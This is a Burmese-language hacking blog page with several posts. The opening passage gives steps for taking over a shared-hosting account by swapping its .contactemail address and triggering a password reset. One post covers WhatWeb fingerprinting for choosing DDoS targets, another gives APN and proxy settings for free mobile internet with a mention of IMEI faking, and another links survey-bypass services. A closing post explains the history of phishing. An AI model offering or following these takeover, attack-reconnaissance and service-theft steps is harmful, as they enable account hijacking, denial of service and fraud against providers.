ကြ်န္ေတာ္ပုံမွာကေတာ့ /home/fortun03/ လုိ ့ျဖစ္သြားမယ္ေပ့ါဗ်ာ... တစ္ခုနဲ ့တစ္ခု မတူလုိ ့ပါ။
ေအာက္ကပုံေလးဆက္ၾကည့္ပါအုံး..


http://i.imgur.com/IbTKgOZ.png





 အဲ့မွာ.. .contactemail ဆိုတာ ပါပါ တယ္.. အဲ့တည္းကို ၀င္ရပါမယ္...
ပုံေတြ က ေသးထားတယ္ဗ်ာ.. ကြန္န၇ွင္ မေကာင္းတဲ့သူေတြ အဆင္ေျပေအာင္ပါ... မျမင္ရဘူးထင္ရင္ Ctrl ကို ဖိထားျပီး Mouse မွ ဘီးေလးကို ေရွ  ့တုိး ေနာက္ဆုတ္ လုပ္ျပီး ၾကည့္နုိင္ပါတယ္...
ကဲဆက္လုိက္မယ္... အဲ့ contactemail ဆုိတဲ့ ဖုိင္တည္း၀င္လုိက္ရင္ေအာက္ကလုိ မ်ဳိးလင့္ကိုျမင္ရပါမယ္.
http://img11.imageshack.us/img11/2372/lgt4eb1.png

ပုံတည္းမွာျမင္ရသလုိ Gmail လိပ္စာတစ္ခုကို ျမင္ရမွာျဖစ္ပါတယ္...
အဲ့လိပ္စာေနရာကို သင့္ G-Mail လိပ္စာလည့္ျပီး save လုပ္လုိက္ပါ..
ျပီးရင္ Host ကိုသြားျပီး Forgot password ကေန သြားလုပ္ရင္ သင္ G-Mail တည္းကို Password Restart code ကေရာက္လာမွာျဖစ္ပါတယ္..
ကဲ ဒီေလာက္ဆုိ အဆင္ေျပေလာက္မယ္ထင္ပါတယ္...
မေျပလည္း ဦးေႏွာက္နည္းနည္းသုံးျပီးစဥ္းစားလုိက္ပါ.. သူမ်ားက ဒါဆုိ ဒါ ျဖစ္ေနတဲ့ ဘ၀မ်ဳိးကုိထားခဲ့ျပီး ကို ့ လမ္းကုိ ေရႊး ျပီး ကုိ ့အေတြး ကို ခ်ဲ  ့ ေစခ်င္ပါျပီ...

Credit : Min Soe Yar Sar

Usage of What Web ( Back Track)


What is whatweb ?

What web ဆိုတာက ဘာ ၀က္လဲတဲ့ ရွင္းတယ္ေနာ္
ေျဖလုိက္ေပါ့ အသားတိုး၀က္လုိ့ :P

ဟုတ္ကဲ့ က်ေနာ္တုိ့ Website ေတြကို ဘာအမ်ိုးအစားပါ ဘယ္အုိင္ပီမွာထိုင္ထားပါတယ္
ဘာေတြ String ထားပါတယ္ ဘာဆာဗာပါ ဆိုတာကို အေသးစိတ္ရွင္းျပေပးတဲ့ဆိုက္ေလးပါ
က်ေနာ္ DDos တိုက္တုန္းကဆို ဆိုက္တစ္ခုကို က်ဖို့အတြက္ က်နုိင္မက်နုိင္ကို
ဒီေကာင္ေလးနဲ့ခ်ိန္ရပါတယ္ ဘာေတြ ဆင္ထားလဲ တုိ့ဘာတုိ့ကိုေပါ့

Terminal >>> /pentest/enumeration/web/whatweb/

ျပီးရင္ ./whatweb လို့ထည့္လုိက္
ကဲအဲ့ဒီမွာ Usage ေတြေတြ့လိမ့္မယ္
ထားလိုက္ က်ေနာ္တုိ့ စမ္းမယ္

ကဲ ./whatweb -v www.myanmar.com

က်ေနာ္ Hacking ေတြကို တင္ေပးတာက တစ္ခ်ိဳ ့Hacking ေတြကို တိုက္ရိုက္တင္ေပးသလို တစ္ခ်ိဳ ့ေတြကိုလဲ ကိုယ့္ဦးေႏွာက္နဲ ့စဥ္းစားပါလို ့ေျပာခ်င္ပါတယ္..။ က်ေနာ္တို ့ျမန္မာေတြ နည္းပညာ ပိုင္း အားနည္းေနတာ ေတြ ့ရပါတယ္..။ နည္းပညာ ဆိုတာဟာ ေကာင္းတာေကာ ဆိုးတာေကာ ပါပါတယ္.။ ေကာင္းတာခ်ည္းပဲသိထားရမယ္လို ့မဆိုလိုပါဘူး အကုန္လံုးသိထား တတ္ထားရင္ပိုေကာင္း ပါတယ္...။ လိုအပ္ရင္လိုအပ္တဲ့ေနရာမွာအသံုးခ်လို ့ရပါတယ္..။ ဒါေပမယ့္ က်ေနာ္တင္ေပးေနတာ ေတြက သူမ်ားေတြကို ဒုကၡေရာက္ဖို ့မရည္ရြယ္ပါဘူး.. က်ေနာ္တို ့ျမန္မာေတြ နည္းပညာတိုးတက္ေအာင္ ျဖန္ ့ေ၀ရံုပါလို ့ၾကိဳေျပာထားခ်င္ပါတယ္..။ အ့ဲဒါေၾကာင့္ က်ေနာ္ စကားတစ္ခြန္းေတာ့ ေျပာထားခ်င္ပါတယ္... ကိုယ္လုပ္ကိုယ္ရ ကိုယ္ျဖစ္ကိုယ္ခံ ဆိုတဲ့စကားပါ..။ က်ေနာ္ေျပာတဲ့ နည္းေတြသံုးျပီး ျပႆနာ မတက္ဘူးလို ့လဲအာမမခံပါဘူး အကယ္လို ့တက္ခ့ဲရင္လဲ ကိုယ္အျပစ္ကိုယ္ခံပါ.. က်ေနာ္ကိုေခါင္းပံုမခ်ပါနဲ ့က်ေနာ္က နည္းပညာျဖန္ ့ေ၀ေပးတာပါ.. လူတိုင္းကို ဒီအတိုင္းလုပ္ပါလို ့တိုက္တြန္းေနတာမဟုတ္ပါဘူး...။ လိုခ်င္တဲ့လူ ေလ့လာ မလိုခ်င္ရင္ မေလ့လာပါနဲ ့.။

ONLINE SURVEYS မ်ားအား ေက်ာ္ခြျခင္း





Surveys မ်ားနဲ ့ပတ္သက္ျပီးေတာ္ေတာ္မ်ားမ်ား အာ၇ုံစားေနတာေတြ ့ရပါတယ္။ ကြ်န္ေတာ္လည္းအပါအ၀င္ေပ့ါ...အထူးသျဖင့္ Download လုပ္တဲ့ဆုိဒ္ေတြ မွာ ပုိဆုိးပါတယ္။
ဒီေတာ့ အဲ့လုိ Online Surveys ေတြကို ဘယ္လုိ bypass(ေက်ာ္ျဖတ္ျခင္း) လုပ္ၾကမလဲဆုိတာပါဘဲ။.
အရင္ဆုံး မိမိ ေဒါင္းေလာ့ ဆြဲမယ့္ လင့္က survey ပါလာမယ္ဆုိရင္ေတာ့
ေအာက္က လင့္ ႏွစ္ ခုကို သြားလုိက္ပါ။
အဲ့မွာ သင့္ ေဒါင္းေလာ့ လင့္ ထည့္ဖုိ ့ Box ေလးေတြပါပါတယ္။။. အဲ့ေဘာက္ေလးေတြတည္းမွာ သင္ေဒါင္းေလာ့ ဆြဲမယ့္ လင့္ကိုထည့္လိုက္ပါ.. ျပီးရင္ေတာ့ အမ္းဒါး ေလးေခါက္လုိက္ပါ.. ျပီးရင္သူက Survey bypass လုပ္ျပီး လင့္ေလးျပန္ထုတ္ေပးပါမယ္.. အဲ့လင့္မွာ ေဒါင္းေလာ့ရယူလုိက္ရင္ အားလုံး အဆင္ေျပသြားမွာျဖစ္ပါတယ္...
ဒီေတာ့ ေအာက္ကလင့္ေလးေတြကို သြားလုိက္ၾကပါ...  Survey bypass လုပ္ဖုိ ့ၾကားခံ ေပးတဲ့လင့္ေလး၂ ခုေပ့ါဗ်ာ။ Online Survey အမ်ားစုကုိေတာ့ Bypass လုပ္ေပးပါတယ္... ဒါေပမယ့္ တစ္ခ်ဳိ ့ပာာေတြက်ေတာ့မ ရဘူးဗ်။ ကြ်န္ေတာ္ထပ္ရွာျပီး ထပ္တင္ေပးပါ့မယ္...

Link 1   -->   Link 2


Phone Bill မကုန္ေအာင္ အင္တာနက္အသုံးျပဳမယ္ (Update)


ကဲ အားလုံးပဲ ဒီတစ္ခါေတာ့ Facebook ထဲကကြ်န္ေတာ္ေဘာ္ဒါတစ္ေယာက္ဆီကေန ပုိက္ဆံမကုန္တဲ့ အင္တာနက္ဖုန္းသုံးနည္းကုိ ေဖာ္ျပလုိက္ပါတယ္။ သိထားရမွာက နည္းလမ္းေတြကုိရွာေဖြရတာဟာ အိပ္ေရးပ်က္ခံ၊ အပင္ပန္းခံျပီးရွာရတာမုိ႔ တစ္ခုခုျဖစ္ခဲ့ရင္ အျပစ္မဆုိၾကဖုိ႔ ၾကိဳတင္ျပီး သတိေပးခ်င္ပါတယ္။ ဒီပုိ႔စ္မွာ မူရင္းပုိ႔စ္ပုိင္ရွင္ ကုိယ္တုိင္စမ္းသပ္ေဖာ္ျပထားတဲ့နည္း၊ သူအသုံးျပဳခဲ့တဲ့ Device ေတြနဲ႕ဆုိရင္ေတာ့ အဆင္ေျပမွာပါ။ အျခား Device ေတြကုိလည္း ကြ်န္ေတာ္အေနနဲ႔ မစမ္းသပ္ႏုိင္လုိ႔ နားလည္ေပးေစခ်င္ပါတယ္။ ေအာက္ကပုိ႔စ္ေတြဟာ မူရင္းပုိ႔စ္ပုိင္ရွင္ရဲ႕ စာသားအတုိင္းပဲျဖစ္ပါတယ္။ စာလုံးေပါင္းသတ္ပုံေတြကုိ ျပင္ဆင္ေပးတာက လြဲလုိ႔ေပါ့။ :D
1. 3G အင္တာနက္ဖြင့္ထားေသာ Sim Card (မွတ္ခ်က္...GSM လဲရပါတယ္)
2. ကိုယ္ရဲ့ဖုန္းလံုျခံုးေရအတြက္ စိုးရိမ္တယ္ဆိုရင္ IMEI ကို Fake လုပ္ထားရပါမယ္
(ဒါကေတာ့ လိုအပ္ခ်က္မဟုတ္ပါဘူး ကြ်န္ေတာ္ကေတာ့ မလုပ္ဘူးေအးေရာ India ကဆိုရင္ေတာ့လိုမယ္)
3. လုပ္နည္းကေတာ့ APN setting ခ်ိန္းတာပါ ေအာက္မွာေဖာ္ျပထားပါတယ္။
(မွတ္ခ်က္ ကြ်န္ေတာ္ကေတာ့ Samsung Galaxy Ace နဲ့ စမ္းသပ္ထားတာျဖစ္လုိ႔
Galaxy APN ခ်ိန္းနည္းအတိုင္းတင္ျပပါမယ္)
Setting >>>Wireless and networks>>>Mobile networks>>>Acess Point Names ကိုအဆင့္ဆင့္သြားပါ ျပီးရင္ Menu key ကိုနိွပ္ျပီး New APN ကိုေရြးပါ ျပီးရင္

---Name ေနရာမွာ 3G free (any) Type 1 WAP လို့ျဖည့္လိုက္ပါ

---APN ေနရာမွာ wapwest.cellone.in လို့ေရးေပးပါ
---Proxy ေနရာမွာ 110.100.3.2 လို့ေရရးပါ
---Port ေနရာမွာ 9209 လုိ႔ေရးပါ
---User name ေနရာမွာ ppp
လုိ႔ထည့္ပါ။
---Password ေနရာမွာ ppp123 လုိ႔ေရးပါ
---Server ေနရာမွာ 110.100.3.2:9209 လုိ႔ထည့္ပါ။
---MCC ေတာ့ 414 ပါပဲ
---MNC ေတာ့ 01 ပါ
---Authentication type မွာ CHAP ကိုေရြးပါ
---APN type မွာ Internet ကိုေရြးပါ

ျပီးရင္ Save လုပ္ျပီး ခုလုပ္ထားတဲ့ APN ကို ON ခဲ့ပါ
ျပီးရင္ အင္တာနက္ကို On လိုက္ပါ သိုမဟုတ္ Use packet data ကို အမွန္ျခစ္လိုက္ပါဟုတ္ကဲ့ အင္တာနက္ မရေသးပါဘူး ရေအာင္လုပ္ရပါအံုးမယ္
ဘယ္လိုလုပ္ရမလဲဆိုေတာ့ Kali Linux OS တင္ထားတဲ့ computer မွာ usb tethering ကို on လိုက္ရပါမယ္ အင္တာနက္တက္ျပီးဆိုတာနဲ့ Moblie ကေရာ ဒါမွမဟုတ္ ျကိုက္တဲ့ ကြန္ပ်ူတာမွာသြားသံုးလို့ရပါျပီ တစ္ခါ on ခ်င္ရင္ တခါ kali ကိုေျပးရမွာေနာ္ MPT က မပိတ္သေရြ့ေတာ့ရေနပါလိမ္မယ္ ပိတ္သြားရင္ တားတားလဲမတတ္နိုင္ပု ဟိဟိ။
ျဖည့္စြက္ခ်က္။ လိုအပ္ခ်က္ တစ္ခုရိွသြားတယ္ဗ် kali မွာသံုးမွ မျဖတ္တာ က်န္တာေတြမွာျဖတ္တယ္ေနာ္ ျပီးေတာ့ ကြန္ပ်ဴတာမပိတ္ခင္ အင္တာနက္အရင္ပိတ္ရတယ္။ မေန့က kali OS (Gnome) နဲ့ သံုးတာ မျဖတ္လို႔ ဒီေန႔ backtrak နဲ့သံုးေတာ့ ျဖတ္သြားတယ္ မေက်နပ္လို့ kali နဲ့ ျပန္သံုးတာ မျဖတ္ဘူး kali ကိုနဲ့အဆက္သြယ္မျဖတ္ခင္ အင္တာနက္ကိုအရင္ပိတ္ဖို့မေမ့နဲ့အံုးဗ်
Screenshot:
 
Kali Linux ကုိ ေဒါင္းခ်င္ရင္ ဒီ ကုိသြားပါ။
Kali OS, BT ေတြအေၾကာင္းအေသးစိတ္သိခ်င္ ဒီ ဂရုကုိသြားပါ။ 
Credit : Min Soe Yar Sar
Special Credit: Than Moe 

Friday, April 12, 2013

hacking နည္းပညာထဲက Phishing နည္းဆိုတာ


Phishing ဆိုတာဟာ တရား၀င္ ၀က္ဘ္ဆိုက္ပံုစံမ်ဳိးအေယာင္ေဆာင္ၿပီး အသံုးျပဳသူေတြ ဆီကေန username, password, အေႂကး၀ယ္ကတ္နံပါတ္စတဲ့ ကိုယ္ေရးကိုယ္တာ အခ်က္ အလက္ေတြ ရယူႏိုင္ေအာင္ တိုက္ခိုက္တဲ့ နည္းစနစ္ကို ေခၚဆုိျခင္းျဖစ္ပါ တယ္။ Phising နည္းကို e-mail နဲ႔ instant messaging စနစ္ေတြအသံုးျပဳၿပီး တိုက္ခိုက္သူေတြရဲ႕ အေယာင္ေဆာင္ ၀က္ဘ္ဆိုက္ေတြထဲ လမ္းၫႊန္ သြား ကာ ကိုယ္ေရးကိုယ္တာ အခ်က္ အလက္ အေသးစိတ္ကို ရယူတာျဖစ္ပါတယ္။ အဓိကအားျဖင့္ေတာ့ PayPal, eBay, YouTube နဲ႔ online ဘဏ္ေတြဟာ phishing တိုက္ခိုက္သူေတြရဲ႕ ဦးတည္ ရာျဖစ္ေနၾကတာကို ေတြ႕ရပါ တယ္။



Phishing နည္းနဲ႔တိုက္ခိုက္ႏိုင္ေၾကာင္း နည္းပညာဆိုင္ရာ အေသးစိတ္ရွင္းလင္းေရးသား ထားခ်က္ကို ၂၀၀၇ ခုႏွစ္အတြင္း Interex လို႔ေခၚတဲ့ International HP Users Group ဆီတင္သြင္းတဲ့ စာတမ္းတစ္ ခုမွာေဖာ္ျပထားၿပီး phishing ဆိုတဲ့စကားလံုးကိုေတာ့ ၁၉၉၆ ခုႏွစ္ ဇန္န၀ါရီလ ၂ ရက္ေန႔မွာ America Online ရဲ႕ Usenet newsgroup မွာ စတင္အသံုးျပဳ ခဲ့တာကို ေတြ႕ရပါတယ္။

အေစာပိုင္း phishing နည္းနဲ႔တိုက္ခိုက္သူေတြဟာ AOL ၀န္ထမ္းအေယာင္ေဆာင္ၿပီး အသံုးျပဳ သူေတြဆီ instant message ကေနတစ္ဆင့္ password ေတြေတာင္းယူကာ spam message ေတြ ေပးပို႔ၾကတယ္လို႔ သိရပါတယ္။ ဒီလိုကိုယ္ေရးကိုယ္တာ အခ်က္အလက္ေတြ ရယူကာ တိုက္ခိုက္တဲ့လုပ္ရပ္ေတြက်ယ္ ျပန္႔လာတာေၾကာင့္ ေနာက္ပိုင္းမွာ ကုမၸဏီကေန ဘယ္ AOL ၀န္ထမ္းကမွ အသံုးျပဳသူရဲ႕ ကိုယ္ေရးကိုယ္တာအခ်က္အလက္နဲ႔ password   ေတြ ေတာင္းယူျခင္း မျပဳဆိုတဲ့စာသားကို instant message တိုင္းမွာ ထည့္သြင္းေပး လာရ တယ္ လို႔ ဆိုထားပါတယ္။

အဲဒီေနာက္မွာေတာ့ တိုက္ခိုက္သူေတြဟာ online ေငြေခ်စနစ္ေတြကို ေျပာင္းလဲ တိုက္ခိုက္ လာၾကတာကို ေတြ႕ရပါတယ္။ ၂၀၀၁ ခုႏွစ္ ဇြန္လမွာ E-gold ဟာ phising နည္းနဲ႔ ပထမဆံုး တိုက္ခိုက္ခံရတဲ့ ေငြေခ်စ နစ္ ျဖစ္လာပါတယ္။ ၂၀၀၄ ခုႏွစ္ အေရာက္မွာေတာ့ phishing တိုက္ခိုက္မႈေတြဟာ တစ္ကမၻာလံုး အတိုင္းတာနဲ႔ က်ယ္ျပန္႔လာတဲ့ ရာဇ၀တ္မႈႀကီး တစ္ခုျဖစ္ လာခဲ့ပါတယ္။

တိုက္ခိုက္သူေတြအေနနဲ႔ online ေငြေခ်မႈစနစ္ ဒါမွမဟုတ္ အေမရိကန္ျပည္တြင္းအခြန္မ်ားဌာန ကေန ေပးပို႔တဲ့ပံုစံမ်ဳိးအေယာင္ ေဆာင္ e-mail ေတြကို သုံးၿပီး ကိုယ္ေရးကိုယ္တာ အခ်က္ အလက္ေတြကို ရယူလာၾကပါတယ္။

လူတစ္ဦးခ်င္းစီကို သီးျခားရည္ရြယ္တဲ့ phishing တိုက္ခိုက္မႈေတြကို spear phishingု လုိ႔ေခၚ ဆိုၿပီး စီးပြားေရးလုပ္ငန္းရွင္ေတြနဲ႔ ကုမၸဏီအမႈေဆာင္အရာရွိေတြကို ရည္ ရြယ္တိုက္ခိုက္ တာေတြကိုေတာ့ whaling လို႔ ေခၚဆိုၾကတဲ့ အေၾကာင္းလည္း သိရပါတယ္။

Social networking ၀က္ဘ္ဆိုက္ေတြ ဟာလည္း phishing တိုက္ခိုက္မႈေတြရဲ႕ ဦးတည္ ရာျဖစ္လာေနတာကို ေတြ႕ရပါတယ္။ ၂၀၀၆ ခုႏွစ္ေႏွာင္း ပိုင္း မွာေပၚထြက္ခဲ့တဲ့ worm က MySpace ရဲ႕ စာမ်က္ႏွာအတြင္းက linkက ေတြကို ေျပာင္းလဲကာ တိုက္ခိုက္သူ ေတြရဲ႕ ၀က္ဘ္ဆိုက္ထဲ redirect လုပ္ၿပီး login အခ်က္အလက္ေတြကို ခိုးယူခဲ့ပါတယ္။

 ေလ့လာမႈေတြ အရလည္း social networking ၀က္ဘ္ဆိုက္ေတြကို ဦးတည္တဲ့ တိုက္ခိုက္ မႈေတြရဲ႕ ၇၀ ရာခိုင္ႏႈန္းဟာ ေအာင္ျမင္တဲ့အေၾကာင္း သိရပါတယ္။

Phishing တိုက္ခိုက္မႈေတြအတြင္း အမ်ားဆံုးအသံုးျပဳတဲ့နည္းလမ္းကေတာ့ အမွန္တကယ္ရွိေန တဲ့ ၀က္ဘ္ဆိုက္ေတြကိုစာလံုး မွား ေပါင္းထား တဲ့ URL ဒါမွမဟုတ္ subdomain ေတြကို အသံုးျပဳျခင္းအားျဖင့္ လွည့္စားထားၾကတာျဖစ္ပါတယ္။ ဒါ့အျပင္ မ်က္စိ နဲ႔ ျမင္ေန ရတဲ့ link မွာ ယံုၾကည္စိတ္ခ်ရတဲ့ ၀က္ဘ္ ဆိုက္ နာမည္ထည့္ထားကာ ေနာက္ကြယ္မွာ တိုက္ခိုက္ သူေတြရဲ႕ အေယာင္ေဆာင္ ၀က္ဘ္ဆိုက္ထဲေရာက္  ရွိ သြားေအာင္ လုပ္ေဆာင္ၾကတာေတြ လည္း ရွိပါတယ္။ ေနာက္ထပ္နည္းလမ္းေဟာင္းတစ္ခုကေတာ့ username နဲ႔ password ကို address bar ထဲမွာ တစ္ခါတည္း႐ိုက္ထည့္လို႔ရတဲ့နည္းကို သံုးတာပဲျဖစ္ ပါတယ္။

ဥပမာအားျဖင့္ သာမန္အသံုးျပဳသူတစ္ ေယာက္အေနနဲ႔ http: www.google.com@ members.tripod. comThis e-mail address is being protected from spambots. You need JavaScript enabled to view it ဆိုတဲ့လိပ္စာဟာ Google ၀က္ဘ္ဆိုက္ထဲေရာက္ရွိ မယ္လို႔ ထင္ၾကေပမယ့္ အမွန္တကယ္ အားျဖင့္ members. tripod. com ထဲ ေရာက္ရွိသြား ကာ www.google.com ကေတာ့ username အျဖစ္ ၀င္ေရာက္သြားမွာျဖစ္ပါတယ္။

အခုအခါ Inter- net Explorerv မွာ ဒီလိုအသံုးျပဳတဲ့နည္းလမ္းကို disable ျပဳလုပ္ထားၿပီး Firefox နဲ႔ Opera တို႔မွာေတာ့ သတိေပးခ်က္ထုတ္ျပန္ေပးတာကို ေတြ႕ရပါတယ္။ တခ်ဳိ႕ phishing တိုက္ခိုက္မႈ ေတြမွာဆုိရင္ JavaScript ကိုသံုး ၿပီး address bar အတြင္းက လိပ္စာ ကို ေျပာင္းလဲ ထားျခင္း URL အတြင္း အစစ္အမွန္၀က္ဘ္ ဆိုက္လိပ္စာအတုိင္း ဖန္တီးထားတဲ့ image ထည့္သြင္းျခင္း စတာ မ်ဳိး ေတြလည္း လုပ္ေဆာင္တတ္ၾကပါ တယ္။

အခု ေနာက္ပိုင္းမွာေတာ့ cross-site scripting လို႔ေခၚတဲ့ တိုက္ခိုက္မႈ နည္းလမ္းသစ္ကို အသံုးျပဳ လာၾက တာကို ေတြ႕ရပါ တယ္။ ဒီစနစ္ဟာ တျခား phi-shing တိုက္ခိုက္မႈေတြလိုမ်ဳိး အေယာင္ေဆာင္၀က္ဘ္ ဆိုက္ေတြ ကို အသံုးျပဳတာမဟုတ္ဘဲ မူရင္း ၀က္ဘ္ဆိုက္ ထဲ script ထည့္သြင္းကာ ကိုယ္ေရးကိုယ္တာ အခ်က္အလက္ေတြကို ခိုးယူျခင္းျဖစ္ပါ တယ္။

Anti-phishing ကုမၸဏီ ေတြအေနနဲ႔ အေယာင္ေဆာင္ ၀က္ဘ္ဆိုက္ေတြကို ရွာေဖြမွတ္တမ္း တင္ကာ အသံုးျပဳသူေတြဆီ သတိေပးခ်က္ ထုတ္ျပန္ေပးေန တာေၾကာင့္ phishing တိုက္ခိုက္ သူေတြအေနနဲ႔ ၎တို႔ရဲ႕ ၀က္ဘ္ ဆိုက္ထဲမွာ ႐ိုး႐ိုးစာသားေတြအစား Flashး ကို အေျခခံထား တဲ့ ၀က္ဘ္ ဆိုက္ေတြအသံုးျပဳ လာေနၾက တဲ့ အေၾကာင္း သိရပါတယ္။

၀က္ဘ္ဆိုက္အေျချပဳတိုက္ခိုက္မႈေတြအျဖစ္ မိုဘိုင္းဖုန္းေတြကေန message ေပးပို႔ၿပီး အသံုးျပဳ သူ ေတြရဲ႕ ဘဏ္စာရင္း ထဲျပႆနာ ေပၚေန တာေၾကာင့္ ဖုန္းဆက္ဖို႔ ေျပာဆိုကာ နံပါတ္ တစ္ခု ကိုေပးထား တတ္ပါ တယ္။ အဲဒီနံပါတ္ကို ေခၚဆို လိုက္တာနဲ႔ တစ္ၿပိဳင္နက္ ဘဏ္ စာရင္း နံပါတ္နဲ႔ PIN တို႔ကို ေတာင္းယူ သြားတာျဖစ္ပါတယ္။ ဒီ Vishing (Voice Phishing) တိုက္ခိုက္မႈေတြမွာ တရား၀င္အဖဲြ႕ အစည္းေတြ ဆီကေန ဆက္သြယ္ ေျပာဆိုလာတယ္လို႔ ထင္ ရေအာင္ caller ID ေတြကိုလည္း လိုသလိုေျပာင္းလဲအ သံုးျပဳတတ္ၾကတဲ့ အေၾကာင္း သိရပါ တယ္။ Phishing တိုက္ခိုက္မႈေတြ ေၾကာင့္ ၂၀၀၄ ခုႏွစ္ ေမလကေန ၂၀၀၅ ခုႏွစ္ ေမလ အတြင္း အေမ ရိကန္ႏိုင္ငံ အတြင္းက ကြန္ပ်ဴတာ အသံုးျပဳသူေတြ ထိခိုက္ခဲ့ရၿပီး ေဒၚလာ ၉၂၉ သန္း နစ္နာခဲ့ၾက ရတဲ့ အေၾကာင္း သိရပါတယ္။

ယူ ေကႏိုင္ငံအတြင္းမွာလည္း ကြန္ပ်ဴတာအသံုးျပဳသူ ၅ ရာခိုင္ႏႈန္း ဟာ Phishing တိုက္ခိုက္ မႈေတြ ခံေနၾက ရေၾကာင္း သိရပါတယ္။ Phishing တိုက္ခိုက္ခံရမႈေတြ ကို ေလွ်ာ့ခ်ဖို႔ အတြက္ ကြန္ပ်ဴတာ အသံုးျပဳသူေတြကို ပညာေပးျခင္း၊ Web browser ေတြအတြင္း anti-phishing လုပ္ေဆာင္ခ်က္ေတြ ထည့္သြင္းေပးျခင္းစတာေတြ လုပ္ေဆာင္လာၾကပါတယ္။

 အေမရိကန္ျပည္ေထာင္စုမွာ Anti-Phishing Act of ၂၀၀၅ ကို ျပ႒ာန္းကာ အေယာင္ေဆာင္ ၀က္ဘ္ဆိုက္ ဖန္တီးသူနဲ႔ အေယာင္ေဆာင္ e-mail ေပးပို႔သူေတြ ကို ေထာင္ဒဏ္ ၅ ႏွစ္ နဲ႔ ေငြဒဏ္ ေဒၚလာ ၂ သိန္း ၅ ေသာင္းအထိျပစ္ဒဏ္ေပးႏိုင္ေအာင္ လုပ္ေဆာင္ခဲ့ၿပီး ယူေကႏိုင္ငံ မွာ လည္း ေထာင္ဒဏ္ ၁၀ ႏွစ္ အထိ ျပစ္ဒဏ္ေပးႏိုင္တဲ့ Fraud Act 2006 ကို ျပ႒ာန္းထားတဲ့အေၾကာင္း သိရပါတယ္။

Free Backlinks
Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Affiliate Network Reviews